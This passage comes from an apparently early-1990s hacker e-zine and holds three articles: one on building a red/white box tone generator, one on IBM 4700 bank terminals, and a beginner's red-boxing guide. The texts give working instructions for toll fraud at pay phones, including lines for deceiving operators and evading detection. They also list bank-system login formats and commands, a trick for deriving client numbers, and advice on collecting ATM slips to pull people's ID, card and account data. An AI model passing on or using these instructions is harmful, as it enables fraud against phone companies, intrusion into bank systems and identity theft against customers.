Col 3ÄÄ´ ÃÄÄÄRow 3
6³ ³11
VssÄÄ´ ÃÄÄÄRow 4
7³ ³10
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄOSCÄINÄÄ´ ÃÄÄÄMUTE OUT
ÂÁÂ 3.579545 Mhz Crystal 8³ ³9
ÁÂÁ Control OSC. ÚOSCÄOUTÄÄ´ ÃÄÄÄCol 4
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Replace above with the below to have both Red & White Boxes in one.
ÚÄÄÄÂÄÄÄÄ
ÂÁÂ ÂÁÂ 3.579545 Mhz
ÁÂÁ ÁÂÁ
À ³ Ù If you put a two-way switch you can switch from crystal,
ÀÄÄÄÄÄÄ to crystal, and you'll have a red and white (combo) box!
Your new crystal should be 6.5536 for "*" Key
Pin Description
~~~~~~~~~~~~~~~
Vdd (Pin 1): The positive supply to the device, referenced to
Vss. A power-on reset circuit ensures correct operation
following initial power-up.
Vm (Pin 2): The negative terminal of the back-up battery for on-hook
memory retention. A low-voltage detect circuit prevents
missoperation of the circuit in the event of a reduction in
the on-hook supply voltage below that required to retain
stored data.
COLUMN & ROW Scans (Pins 3, 4, 5, 9, 11, 12, 13, 14, 15): When no key is
closed, pull-up resistors are active on COLUMN inputs and
pull-down resistors are
active on ROW inputs. Therefore
after a key is pressed the ROW pull-down resistors cause a
negative-true on COLUMN inputs (for standard telephone
key-pads negative-common).
Vss (pin 6): The negative supply to the device in the off-hook
state.
OSC IN, OSC OUT (pin 7, 8): All logic and tone generator timing is
derived from the on-chip oscillator circuit.
MUTE OUT (pin 10) This is a CMOS output which sinks current to
Vss when no tones are being generated and sources current
from Vdd when tones are being generated.
TONE OUT (pin 16): This output is the open emitter of an NPN
transistor. The other pin (collector) is connected with the
Vdd.
Well, this is the exact pin description according to the abilities and
limitations of this IC. Now this Integrated Circuit (IC) was designed to
be powered by the telephone line and a battery to keep the memory intact.
Well, due to the fact that we are powering this circuit by battery you can
feed both Vm and Vss to the same negative supply, the battery, of course.
Now the MUTE OUT pin is perhaps also bothering you; well, this circuit was
designed to drive a simple interface circuit to mute the receiver when any
key is depressed. Again this is NOT needed as you will be connecting your
DTMF generator to a small speaker rather than putting it directly into the
line, as this circuit was designed for that, so all that MUTE does is when
you start depressing keys it mutes of the receiver so that it will not
interfere with other incoming sounds misstated as DTMF tones. However you
can avoid adding a speaker by un-screwing the mouth piece and feed the
TONE-OUT and Vdd supply directly into the conventional payphones, however
this may attract unwanted glances, so you'll be better off with a
speaker.
The next part is about the key-pad, perhaps complex if you plan to design
your own. Frankly, I found that time consuming; you can buy key-pads in
several electronics stores, as Radio Shack, but I did find it in a local
electronics store. Then again, if you have an old phone I guess you can
take it from there. Now I must warn you there are TWO types of key-pads
that are widely used, and both will work on this circuit, but you need
to know which one you have in order to make corrections.
The key-pad found in most telephones are what we call STANDARD KEYPADs.
This has to do on the way the switch is connected inside.
³ Simply, when a key is depressed, it closes the
ÄÄÄÄÄÄÂÅÄÄÄRow switch but also comes in contact with the
³Ù³ negative power supply. Thus we call this method
ÄÄ´ ³ NEGATIVE-COMMON or/and standard key-pad.
Vss³Ä´
Col
³ As you can see, this method consists of the row
ÃÄÄ¿ and column coming to contact (a closing of a
³ switch). This type of keypad we call
ÄÄÄÄÄÄÄÅÄÄþÄRow SINGLE-CONTACT key-pad.
³
Col
If you plan to build your key-pad certainly the single key-pad is the way
to go, it's a lot simpler. So if your using a standard key-pad remember to
connect the negative supply to the key-pad! All that's left now is to
connect the key-pad to the circuit, very easy and fast; you just connect
Col 1 to Col 1, Row 1 to Row 1, etc... You may notice that this is a
military-style key-pad, as it includes the A, B, C, D keys which you don't
find in your everyday phone key-pads. You really don't need them, so if
you don't have them don't alarm yourself, just don't connect them!
However you will need TWO extra keys, one for STORE command and the other
for the REDIAL, so either add an extra key or switch or whatever you wish
and connect it, like so.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄCol 1
³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄCol 2
³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄCol 3
³ ³ ³ ÚÄÄÄÄÄÄÄÄÄCol 4
ÚÄÄÁÄÄÂÄÄÁÄÄÂÄÄÁÄÄÄÂÄÄÁÄÄ¿
³ 1 ³ 2 ³ 3 ³ A ÃÄÄÄÄÄÄRow 1
ÃÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÅÄÄÄÄÄ´
³ 4 ³ 5 ³ 6 ³ B ÃÄÄÄÄÄÄRow 2
ÃÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÅÄÄÄÄÄ´
³ 7 ³ 8 ³ 9 ³ C ÃÄÄÄÄÄÄRow 3
ÃÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÅÄÄÄÄÄ´
³ * ³ 0 ³ # ³ D ÃÄÄÄÄÄÄRow 4
ÃÄÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÅÄÄÄÄÄ´
³Store³ ³Redial³ ÃÄÄÄÄÄÄRow 5
ÀÄÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÄÁÄÄÄÄÄÙ
Ahh, congrads, your DTMF Generator is now completed! If you were like
myself and added an extra switch to go from white box to red box mode,
GREAT! The only difference is that a white box needs the 3.57545 Mhz
crystal and the red box needs the corresponding crystal, so simply put a
switch and move from mode to mode. Now for the red box to work we need five
3900 hertz at 33 milliseconds apart and 33 milliseconds long, so you'll
need to save your key five times in memory and then simply put the box to
the mouthpiece end of the payphone and press the memory key, you have just
enter $0.25 into the payphone.
NOTE: I only have this working with the 6.5536 Mhz crystal. I cannot say
that the timing interval will be exact with the other crystals; chances
are that taking a crystal of 7.XXXXXX or 5.XXXXXX Mhz is simply too far
from the 700 + 2200 hertz tone. Try to get the closest value to 6.50 Mhz.
I didn't include the way to save the red box tone into the memory,
as you get a nice little paper when you buy the IC, but in case you don't
you first power up the unit, press "*" (or your valid red box tone key)
five times and then you press STORE and a number in which to store it in.
And to dial the stored key, press REDIAL and the number in which you
stored the red box tone! Remember the NEW crystal should be installed at
ALL times to generate the RED BOX tone! If you save the tone with your
6.XXXX Mhz intact and redial it with the 3.57545 Mhz it will not work!
Lastly, I recommend an "A-Cut Crystal (NTSC TV color-burst)" for both the
3.57545 and your red box crystal. Try local components stores. You should
find the crystal, or else look around, ask around; I did leave you with a
few references near here where I got most of my stuff so you can try them
out if you can't find them on your own.
REFERENCE
Addison Ltd/Ltee
8018 20th Avenue
Montreal, Canada, H1Z-3S7
tel: 1-514-376-1740
Active Electronic Components
6080 Metropolitan East
Montreal, Canada, H1S-1A9
tel: 1-514-256-7538
1-800-363-7601 (Outside Quebec)
Hamilton Avnet International Canada
2570 Sabourin St., St-Laurent
Montreal, Canada, H4S-1M2
tel: 1-514-331-6443
1-800-361-7129 (Outside Quebec)
National Semiconductors Corporation
2900 Semiconductuctor Drive
Santa Clara, California 95051, USA
ALSO: Try out Motorola and RCA dealers. They carry lots of
crystals that go into TV decoders/scramblers, so there's a
very good chance they should have it.
The crystals don't cost more than $1.00, kaypads can be bought for $0.75,
PCBoard under $1.00, the IC goes for $2.00. The project should cost under
$5 if you can find the supplies in local stores -- if I did in lonely
Canada then you should have no trouble! If they don't have it, ask them to
order it, if they ask "why?" tell them it's for a TV component, as TVs and
related works like decoders and scramblers use NTSC TV color-burst
crystals!
NOTE: For the next InfoJournal I should have a DTMF Generator for "Caller
IDs" (yep, you can send your own DTMF Caller ID tones), and how the
number/name is received. So call up your local BBS with Caller ID and make
it display 666-6666 and logon as your favourite Death-Angel character name.
Those interested in the actual project can contact myself anytime soon, of
course you have must have a grasp of electronics!
Rock Steady/NuKE
===========================================================================
===========================================================================
The IBM 4700 Unix Based Systems - PART I
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For those advanced hackers and perhaps "crazy" ones, the IBM 4700s are
a new light. These systems are generally one of the hottest systems one
can ever access. Theses systems are usually used in banks, and they are
quite WIDELY used in Canada and the USA. I cannot speak for other parts of
the world as I haven't been able to locate any of these huge systems yet!
In this article I will show you a quick intro on the "user-friendly"
4700s. I have also obtained REAL sample captures in order to document
this article better. This article is only being released on the
"free informational" consideration, and is solely for informational
purposes. Any attempt to carry this to a further degree can lead to
serious penalization by the law.
Anyhow lets begin. Ever wonder what type of systems banks must use, when
you set inside for a darn withdrawal or deposit of your money? The banks
do contain somewhat disturbing information about yourself and do also sell
this information to others for great deals of money. Credit Bureaus are
perhaps the best organization to work with the bankers to provide
almost all the credibility a person may hold. One can easily notice if a
bank uses the nominal IBM 4700s by a fast look around inside the bank. Go
in for a transaction and look over the cashier and see if you spot any
terminals. These terminals are simply just a monitor and a keyboard, and
the name "IBM" is usually plastered all over the monitor, so you can at
least know its an IBM Network. Many models have been introduced, each
have an added feature as the model number increases. Today the IBM 4700s
are largely used. All the systems in all the same banks are hooked into
one vast system located perhaps in the central bank head-officesa, and each
individual bank will be hooked into this system during the work hours. I
don't know what system this 4700s hook up to, their speed seems like a
very old Vax system, however I do not know so I can not say exactly. My
experience is only with the station terminals (IBM 4700s).
The IBM 4700s nominally USED 1200/NONE Baud modems. These are perhaps due
to the fact that this system originated in the 1979-80 period. However
today many of these IBM 4700s are adding a 9600 baud modem. Starting in
1988 IBM has developed a 9600 baud modem for these IBM 4700s systems, as it
provides a faster access time and a new security feature. Theses modems
are known as IBM 9600 Modems Model 7861-015, these modems have CUT
possible break-ins by at least 90%. For the first time these modems were
equipped with a Data Encryption Standard (DES), during the 1988-89 period
IBM marketed these 9600 Modems at a startling $2,000 a pop to all of the
bank systems using IBMs.
However, before the 9600 modems, it is only fair to state that the
software was equipped with DES that would encrypt/decrypt information as
it pass through the server in/out the modem. The great improvement was
that the 9600 Modems had DES build into the hardware, and it would
encrypt/decrypt at a much faster rate compared to the older 1200.
Nevertheless expect to encounter DES Encryption. DES contains a 56-bit key,
if the key can be broken you have just accessed the largest system a
person can enter, thus generating the saying "Hacker's Heaven."
You must read the "Data Encryption Standard (DES)" article published in
this InfoJournal by myself to understand that DES is POSSIBLE to break.
Compared to Lucifer, DES is a lot easier, and remote access to a bank
system is very possible. Nevertheless, local access can be gained by
accessing the terminal itself within the network. I will brief you on the
functions and the work abouts of this IBM 4700s system.
One can easily know if they contain access to a IBM 4700s by its logon
feature, which follows the bellow...
------------------------------------
IDENTICATION MODE ADMIN./MODE (4700)
CODE DE L'USAGER / USER ID :
MOT DE PASSE / PASSWORD:
------------------------------------
Okay, the "---" lines simple means that whatever is in between is the
exact input/output this systems gives you once connected. Now the user ID
must follow a certain pattern as that's how accounts are used in this
system. The USER ID goes like so:
XXX XXXXX
³³³ ÀÄÄÄÄÄÄÄÄ> 5 digit number identifying the bank branch.
³³ÀÄÄÄÄÄÄÄÄÄÄÄ> User Letter. If the bank allows five people to access
³³ this system each will have a letter from A to E
³³ representing user #1 as A, #2 as B etc...
³ÀÄÄÄÄÄÄÄÄÄÄÄÄ> Access level: 1=Bank Manager (can do ALL).
³ 2=Bank Director (limited, can view
³ all but cannot make changes many
³ changes, like cancel a loan).
³ 4=Even less access where you cannot
³ view all, and are restricted in
³ changes.
³ 6=View only what #4 can. No
³ changing possible.
ÀÄÄÄ> Language use: X=English
T=French
An example ID would be "T6A10281" whereby 10281 in the branch bank number,
A is the first account in that bank, and 6 is the level of the code and T
is the language to use (French).
Once inside the system you will receive an ":" as a prompt. No help is
given, but I did manage to find a few codes for you. Basically if one
wishes to pull out a user account we can do so with the "CLTIDT6*"
command!
CLTIDT6* -> "*" Functions as an Enter key!
³³³³³³ÀÄÄ> The access level (View). A 4 would allow access to
ÃÙ³ÃÙ³ make changes to the info displayed!
³ ³³ ÀÄÄÄ> Separator
³ ³ÀÄÄÄÄÄ> "ID" = "IDentification requested"
³ ÀÄÄÄÄÄÄ> Separator
ÀÄÄÄÄÄÄÄÄ> "CL" = "CLient Info"
So we can guess this will pull out the Client's ID! Doing an CLTIDT6*
we will get a screen like so:
-------------------------------------------------------
:CLTIDT6*
:::::::: ENREGISTREMENT CLIENT PARTICULIER ::::::::
NO CLIENT :
NOM :
PRENOM :
N.A.S : DATE NAISSANCE:
EMPLOYEUR : TEL :
-------------------------------------------------------
Unfortunately, this was a French account, so all the captures I have are in
French. Here's a quick lesson: NOM --> name; PRENOM --> given name;
N.A.S --> Social Insurance Number (SIN); DATE NAISSANCE --> date of birth.
The rest is simple. To search for a person you must try to fill in AS
MUCH as possible to search for an account! The more INFO you got the
better it is. Once you entered enough data you get two screens that are
as follows. Since this is French, I added the English translation inside
the inside the parenthesis.
-------------------------------------------------------
NO CLIENT : (Client number) TRANSIT: (5-digit bank #)
NO CARTE CLIENT: (Client info number) DEPUIS : (Client since)
NOM : (Real last name)
PRENOM : (Given name) SEXE : (Sex)
ADRESSE NO: (Address #) RUE : (Street) APP.:
VILLE : (City) PROVINCE :
PAYS : (Country) CODE POSTAL :(Postal/ZIP code)
A/S : LANGUE :(Language)
TEL. :
N.A.S : (SIN) DATE NAISSANCE: (Birth) NO PERMIS COND.:
:
--------------------------------------------------------
Pressing Enter will give you the next and final screen:
--------------------------------------------------------
NO CLIENT :
ACTUEL PRECEDENT
EMPLOYEUR : (Current employer) (Last employer)
POSTE OCCUPE: (Job title)
DATE DEBUT : (Since) DEBUT:(Since) FIN:(Until)
CODE: TYPE: TYPE :
TELEPHONE :
MASTER CARD : (M/C card number)
VISA : (Visa card number)
CARTE CLIENT: (Automatic bank card number)
NO COMPTE : (Account numbers [and balance if access >= 4])
:
:
:
:
--------------------------------------------------------
Con't in Part #2
The IBM 4700s Unix Base Systems - PART II
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Everyone can now understand exactly how powerful a 4700s System really is.
But perhaps the mind boggling truth is that this information can be easily
tapped into illegally, and such information can cause great havoc. Perhaps
the most mind boggling feature that I have seem to found interesting is the
search/profile of a client. In this section you can search a client in the
bank with only needing VERY LITTLE information. There are six nominal ways
to search for the clients profile and the are by:
1. The Client Number (Format: XXXXX#########)
The "X" represent letters and the "#" represent numbers. In order
to get the Client Number you could have written it from getting
it in the first part! But the first part demands lots of
information of a person, in order to get it. With this all you
need is the person's last name, first letter of the given name
and date of birth.
Eg: John Smith -- Date of Birth 75-04-21
Client Number = SMITJ249578001
The way we got the number part is like so: take the date of birth
and subtract by 99-99-99. So 75-04-21 = (9-7)(9-5) - (9-0)(9-4) -
(9-2)(9-1). The last three digits are just in case there are
people with the same names and date of birth, kind of rare, 001
is usually ok, but try 002 if another guy exists.
2. Client Enterprise Number (Business Client Number)
Same as above but for companies.
3. Valid Account Number
4. Valid Account Number of a Term-Deposits
5. Automatic Teller Cards
6. Credit Card (M/C or VISA)
One boggling fact is this one: when you go to an Automatic Teller Machine,
check the garbage. You will see that some people will throw away their
slips once they read the balance of the account. One DRAWBACK is that on
the slip you will see your Automatic Teller Card Number written on top!
This is particulary true for Canada's largest banks like Royal Bank,
National Bank and TD Banks that nominally use IBM 4700s! All one must do
is easily take your slip and ALL they need on you can be found in the 4700s
systems, and slowly you find yourself in financial trouble. Sometimes "free
information" such as these articles are written for your protection. The
world is truely ruled by little bits of 1s and 0s, and turning on the right
bits can give you access to virtually anything. The code to access this
search/profile is with the "CLTPR6*" command. Which will give you:
-------------------------------------------------------
:CLTPR6*
1. NO DE CLIENT PARTICULIER : (Client #)
2. NO DE CLIENT ENTREPRISE : (Client # comp.)
3. NO COMPTE BANCAIRE : (Bank account #)
4. NO COMPTE PLACEMENT : (Term-Lock account)
5. NO COMPTE CARTE CLIENT : XXXXXX- (Teller card number)
6. NO COMPTE MASTERCARD : XXXX- (M/C card number)
--------------------------------------------------------
The "Xs" are for SET numbers, depending what Bank system you enter the M/C
and Teller Card always begin with the same first few digits. For Manhattan
Bank M/C begin with 5424... Of course if you enter a Royal Bank the
terminal will read VISA card number rather than M/C as Royal offers the
VISA card. A search with this will get the two screens from the last part.
There is also ways to find out loan information, or how many term-deposit
one has at whatever interest rate. With the right access codes like a T2
or a T1 you can access or void any of these accounts.
HOWEVER: as easy as this sounds, it is quite difficult, then again not
difficult enough! Even if you wish to close your account in any bank your
Information does NOT become erased, as I demonstrated this to Pure Energy
who closed his accounts several years ago, though the information I got
was quite old, as his address was invalid. Nevertheless I did get his date
of birth, SIN and other information that can be used to access other
systems in other banks to gain faster access to his accounts.
Again this seems quite easy, I warn you not to try it, it will get you
penalized by the lawman. Anytime you try to change accounts or access
too much information the system creates a log, and alerts the
administrators.
All the access commands I was able to find out is on the bottom:
-Identification of a client
CLTIDT6 *
-Profil of a Client
CLTPRO6 *
-List of active and closed loans
CTTACT6 / # Client Number
-List of account numbers of a client
CLTDPT6 / # Client Number
-List of Term Deposits of a Client
DPTCDC6 / # Client Number
I hope you found this information useful for your own protection.
Remember don't leave any slips from automatic tellers, and never say your
account number to a cashier, write it down and show it to them. A lot
can be done to ruin you financially with the info these system contain.
And last but not least I am not responsible for any attempts that you
try to illegally access these systems, I know IBM will be GLAD to help
you in sending you information of these system, of course you will have
to "pretend" your part of a big corporation looking into their network!
Rock Steady/NuKE
===========================================================================
===========================================================================
A Beginner's Guide to Red Boxing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
About six months ago I made my first red box, and let me tell you, this is
the way to go. With the ever-increasing dangers of phreaking, red boxing
provides a safe, effective alternative that is easily available to those
with little technical knowledge and allows calls anywhere in the world with
only a small investment. Before I elaborate on how to construct your red
box (unlike Rock Steady, I took the easy way out and used the now-famous
Radio-Shack conversion) and list some of the "tricks of the trade," let's
list the pros and cons of red boxing compared to other forms of phreaking.
Pros
~~~~
* UNTRACEABLE! Fuck ESS, nothing can find you with a red box! You're just
an average joe using a pay phone. Even if they do catch on, you can
just hang up and try again... Just don't abuse the same pay phone
for hundreds of dollars a month and everything's cool.
* Small, easy-to-carry unit is portable, durable, and looks like a
legitimate pocket dialer...
* Perfect line quality. No static, no loss of volume, etc. unlike PBXs,
extenders, and other commonly-abused phone systems.
* Low cost...thirty dollars gets you unlimited free calls (I estimate I've
"spent" over $500 so far). The only upkeep cost is new batteries every
few months. There's not even any cost at all for each call you make,
not even local charges, as with PBXs (if applicable in your area).
Cons
~~~~
* Simply put, it's a hassle. You have to drag yourself out to a pay phone
to use it. You have to keep pressing the button periodically to add more
"money." Such is the price for free calls, I suppose...
* Because you're using a pay phone, calls are voice-only. Not only are
accoustic couplers slow and laptop use unusual (ahem), but pay phones
make a click every minute, plus you constantly get a synthesized voice
or operator demanding more money every so often.
* Sometimes you can get a suspicious operator... Your average operator
is of limited intellegence (hell, I've even told an AT&T operator what
I'm doing, and she still didn't get it [Me: "Hi, I'd like to red box a
call to Paris." Bitch: "You'll be paying with quarters?" Me: "No, I'm
red boxing it. It's a device for commiting toll fraud." Bitch: "Sorry
sir, I'm not familiar with that calling plan. Do you want to pay with
your calling card?" Sheesh!]. Then again, five out of five
randomly-sampled AT&T operators didn't know what 2600 Hz is, but that's
another story...) Still, it's a chance. I've gotten a few suspicious
operators who hassle you and return your "money" and ask you to reinsert
it, and even one who knew what I was doing ("Ok sir, none of your
quarters have registered. I'm afraid I'm going to have to report that pay
phone. You aren't using quarters, the tones are coming from a small
black box." I just denied it and she reconnected me, but I kept *that*
call short. Sorry Lone Wolf.) I've even once gotten an intellegent local
operator (gasp!) ("Okay, please insert a quarter now... I'm sorry sir,
that did not sound like the quarter tone. Do you want to try inserting a
real coin?") You can always hang up and hope you get a less intellegent
one, but it's a pain in the ass.
* At least in my area, local calls cannot be boxed directly...you have to
either go through an operator or use an Equal Access override code (see
below). Another hassle.
* To my knowledge, this only works on the North-American phone system...
Tough luck for all you foreigners :-).
* Doesn't work on COCOTs, only pay phones owned by the local telco.
Notes from Nowhere Man
~~~~~~~~~~~~~~~~~~~~~~
All of the above may not apply in your area; it all depends on how your
local telco runs things. Specifically, in some areas you *may* be able to
directly box local calls.
Certain phones don't seem to allow the tones to get through. So far,
I've only found three such phones, two at one location (a gas station).
Hopefully this is just a fluke and not some kind of trend...
Also, don't think that you can get money by using your box and asking
the operator for your money back. It won't work. You see, the actual
coins that you've deposited are returned to you, and since you've put
nothing in, you get nothing out.
I'd also like to add that contrary to what it says in some text files,
it is not necessary to deposit a nickle before making a call. Supposedly
the phone company performs a "ground test" when you make a call, so
something has to be in the coin shute for the call to go through. This may
or may not be true, but I've never deposited a coin before boxing a call
and I've never had any problems directly due to this (I've gotten a few
suspicious operators, but they've always relented after I "re-deposit" my
"quarter" which didn't seem to register. Of course, the international
operators at AT&T are much better informed...)
Building Your Red Box
~~~~~~~~~~~~~~~~~~~~~
There are only two real components for a red box, at least using the
"standard" method. The easiest part to get (but the more expensive one) is
a Radio Shack "Thirty-Three Number Memory Pocket Tone Dialer," catalog
number 43-141 (just ask the guy for "a tone dialer that can store
numbers" to play dumb). At last check these are US$24.95 each (and they're
kept behind the counter, so thieving is basically out unless you have
inside connections). Be sure to get the one with memory features; the one
with no memory is useless. The second thing you'll need is a 6.5536 MHz
crystal. These can be obtained from your local electronics store (they're
hard to find though, I know Radio Shack doesn't carry them) or from a mail
order electronics distributor. (One frequently mentioned is Fry's
Electronics in San Francisco, which sells these crystals for $0.89/each.
They can be reached at 415-770-3763. I did not get my crystal from Fry's,
so I cannot vouch for them.) In most cases the crystals cost between $.25
and $1.00 each, plus postage, if applicable. Oh yeah, you'll also need
three AAA batteries. You can just pick these up at the local convenience
store or buy them at Radio Shack when you buy the tone dialer. (Note:
There is a rumor that Radio Shack is no longer offering the tone-dialer
with memory. The stores in my area still have them in stock, but in some
places they're supposedly unavailable. Get 'em while you can.)
The only tools you'll need to make the red box are a small phillips
screwdriver and a soldering iron (and solder). A pair of tweezers may also
be useful. You'll want to work in a well-lit place, naturally, with good
ventilation (solder gives off horrid fumes). First, unscrew the screws on
the back of the tone dialer's case (there are some in the battery
compartment, too). Carefully pry open the case; you'll need to apply more
force than you would think, but be careful not to break it or lose the
switches, which can fall out when the case is opened. Next, solder out the
3.579 MHz crystal, which looks like a small silver cylinder toward the
bottom-right of the board. Remove the crystal and save it. In it's place,
solder in your 6.5536 MHz crystal, being careful not to let the two leads
touch one another, or to drip solder across the two leads. Because the new
crystal is much larger than the old one, you may have to *CAREFULLY* bend a
few other crystals to make room for it. Put the cover back on, and rescrew
the case. Finally, pop in the three AAA batteries the dialer requires.
You're now ready to program your box.
Programming Your Red Box
~~~~~~~~~~~~~~~~~~~~~~~~
Ok, you've just replaced the crystal in your pocket dialer. Now what
do you do? It's pretty easy. Switch the Store/Dial switch to "Store" and
turn the unit on. The red LED in the upper-left should go on (if it
doesn't, you screwed up; open it up and try again). Now press the "Mem"
button (left-most button on the bottom row) and then hit the star key ("*")
five (5) times. Then press Mem again and press a "Priority" button (one of
the top three buttons); I like to use P3 for this. The unit should beep,
letting you know that the number was stored. This button is now the
"quarter" key. Next, press the Mem button, press P3 (or whatever button
you used for the quarter key), Pause (the middle button on the bottom row),
P3, etc. (As an alternative to the Pause button, I have been informed that
you can use the pound key instead, making your dialing much quicker. I
wouldn't use this on a live operator, though... After experimenting with
this method, I've found that it tends to bring a live operator on the line
very often.) You want to store four "quarters" and five pauses total, a
pause between each "quarter." Then hit Mem again, then P2 (or whatever key
you want to use for the $1.00 key), and wait for the beep. Flip your unit
off, then switch the Store/Dial switch to Dial. Your red box is now ready.
Why Does This Work?
~~~~~~~~~~~~~~~~~~~
You may be asking yourself "how in the world can this work?!" Basically,
the red box works on the principle that when you put money into a pay phone
tones are generated to indicate to the CO that you've dropped in a coin;
the red box simulates these tones, allowing you to make calls for free.
When you replace the factory-installed 3.579 MHz crystal with the 6.5536
MHz one, you are altering the DTMF tones upward so that the star key now
happens to be the same pitch as a coin tone (1700 Hz + 2200 Hz). When you
store the five tones, nothing particular happens; but it so happens that
Radio Shack pocket dialers replay those stored tones at the precise rate
that a pay phone expects for a quarter (five thirty-three millisecond beeps
with a thirty-three millisecond pause between each of the bleeps). (It is
possible to simulate nickle and dime sounds, too, but the timings are
different, and would require much more work for something that's really
useless. Why use small coins when you can just use quarters?) Please note
that because of the tone shift caused by the crystal, the touch-tone keys
will no longer work right...your box is no longer a pocket dialer. For
those interested in keeping the dialing feature, try building the COMBO box
(red/white box), as detailed in text files and 2600 Magazine, Autumn 1992
issue.
For more information on red box theory, and for plans on how to build
a "true" red box (this requires much more time, effort, and skill, and
gives no benefit), check out other files on red boxes (RED.BOX, etc.).
Also refer to Rock Steady's excellent article on red boxing in this issue.
Rock Steady takes the "electronics" approach; being a novice at electronics
I elected to take the easy way and just modify the tone dialer.
(Remembering what it's like to have no idea what the fuck you're doing, I
wrote this file as explicitly as possible. Forgive me if it seems *too*
detailed for you.)
Placing Calls
~~~~~~~~~~~~~
To place a call with a red box, put the speaker on the tone dialer firm
against the mouthpiece of the pay phone, making sure the black rubber ring
on the back of the dialer fits snuggly against the mouthpiece, turn it on
(you can verify that it's on by the LED in the upper-left), and press the
priority (P) buttons as needed to generate quarter sounds. Details are
given for the three types of phone calls: intra-LATA, inter-LATA, and
international.
Intra-LATA (local)
~~~~~~~~~~~~~~~~~~
If you're in the same boat I am, you may not be able to box local calls.
If this is the case, just dial the operator and explain to her how you need
to place call to wherever. Usually she'll just ask for your quarter, but
sometimes she'll ask why you don't do it yourself; in this case, you can
either feign ignorance ("Ah, iz zhat so? I ahm zorry, I ahm visiting from
Germany unt zhere ve have to make khalz through zee operator. Can you dial
it for me?") or feed her some story how the phone keeps swallowing your
quarters or not recognizing them or something. When she asks for the
quarter (or possibly more), give it to her...just press the "quarter" key
however many times is needed, leaving a slight pause between each one to
avoid suspicion (after all, no human can drop in a quarter per second).
"Thank you, please hold. CLICK. RING..."
The better, faster alternative, is to go through AT&T using an Equal Access
override code. Simply dial 10288+1-NPA-NXX-XXXX (basically, you're using
AT&T to place a call which would normally be placed via your local phone
company). Treat this just like an inter-LATA call (see below). Note that
this will only work with AT&T (10288), as only AT&T is equiped to place
long-distance calls from a pay phone. (As a side note, AT&T charges you
about $2.10 or so for a call which would normally cost only $0.25. Kinda'
funny... Of course, with a red box, this doesn't matter.) Unfortunately,
some pay phones block Equal Access codes; if this is the case, just go
through the local operator (after all, the local telco has exclusive rights
to intra-LATA calls).
If you can box local calls, just deposit the virtual quarters after
you dial the number, just like an inter-LATA call (see below).
Inter-LATA (long-distance)
~~~~~~~~~~~~~~~~~~~~~~~~~~
Dial up the number, then wait for the ACTS voice or AT&T operator. "Please
deposit two dollars and fifty-five cents for the first three minutes." Do
as it says...hit the "one-dollar" key twice and then the "quarter" key
three times (or whatever combination is required for your call). (When you
get really fast, you'll find it faster to just use the "quarter" key
exclusively.) "Thank you for using AT&T. You have twenty cents credit
toward overtime..." That's all there is to it. If you do get an operator,
keep cool, just keep putting in money but use the "quarter" key only, as
some operators will get suspicious when you drop in $1.00 in quarters at
perfectly regular intervals. They almost always leave you alone.
Every so-many minutes (usually three or five) a computer voice or a live
operator will ask for more money. Give it to her as outlined above.
Sometimes after you hang up an operator will call the phone back
immediately, demanding some money for overtime. You can either give it to
her (with your box, of course), or "give it to her." It's fun to chew out
the Bell bitch when she can't do a thing about it...they just have to write
off the loss. (They threaten to bill the called party sometimes, but they
can't legally do this; it's just an intimidation tactic.)
International
~~~~~~~~~~~~~
Dial 011, then the country code, then the area code, and finally the
local number; press the pound key ("#") to signal the end of the number.
Wait for the AT&T operator to come on (notice that all long-distance and
international calls that are paid for with coins [as opposed to calling
cards] are only handled by AT&T...really fair). Ask her to put your call
through (she may verify the number), and yes, you are paying with coins.
She'll say something like "Ok, your call will cost $6.50 [this is for
Melbourne, Australia], but I can only take $3.00 at a time. Please insert
the first three dollars now..." Be sure to use only the "quarter" key with
live operators, as many international operators have recently been alerted
to red boxing. They are catching on, so be careful not to arouse their
suspicion. When you "pay" three dollars (heheh) she'll say something like,
"Ok, please wait," then you'll hear the connection going through and
the "foreign" ringing. When someone answers she'll say something like
"This is United States calling, please hold for an international call."
If no one's home, you'll get your money back. Too bad none comes out...
The person is then muted out, then she asks for the rest of the money.
Give it to her. "Thank you, go ahead..." Every so-many minutes (usually
one or two) a live operator will ask for more money. Give it to her as
outlined above. (Note: regardless of what they may say, the operator tends
to hang out on the line and listen in on you. Do not tell the person how
you're calling, as I'm sure that's how they once caught on. I'd also
suggest keeping the conversation legal.)
Sometimes after you hang up an operator will call the phone back
immediately, demanding some money, just as with a long-distance call.
See above for more details.
Where Should I Call From?
~~~~~~~~~~~~~~~~~~~~~~~~~
To be brief, you can use your red box from any true pay phone (red
boxes do not work on COCOTs [privately-owned pay phones]). Notice I say
"can" and not "should;" some phones are definitely better than others.
I've found that the best places to make calls from are government-owned
buildings. Why? These are public places, there are always real pay phones
there, and they are indoors, where it's warm in the winter and cool in the
summer. The best phones are isolated and have a place for you to sit while
you talk. I suggest you box from libraries, schools, municipal buildings,
etc., but in my opinion, high schools are best. Why? They're open late
for sports, etc. most days, even weekends, and you can blend in very easily
(if you're a teenager, you're a student; if you're older, your an older
brother visting your old school; if you look old enough, you're a parent).
Just go after school hours or it'll be noisy... Everyone has a favorite
place, just look around and find yours.
Will I Be Caught?
~~~~~~~~~~~~~~~~~
The following is an approximation of chances of being caught while using
a red box (and dealing with a live operator). You can assume that you
will never be caught when dealing with an electronic "operator" (ACTS).
Again, these are only appoximations based on my experience. Remember,
though, even if you are caught, nothing will happen to you; just hang up
and try again. If they threaten to call the police or anything, just take
off, don't take any chances.
Range % Detected
~~~~~ ~~~~~~~~~~
